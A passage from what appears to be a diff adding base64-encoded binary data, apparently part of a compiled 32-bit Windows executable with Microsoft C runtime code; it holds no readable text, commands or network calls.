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
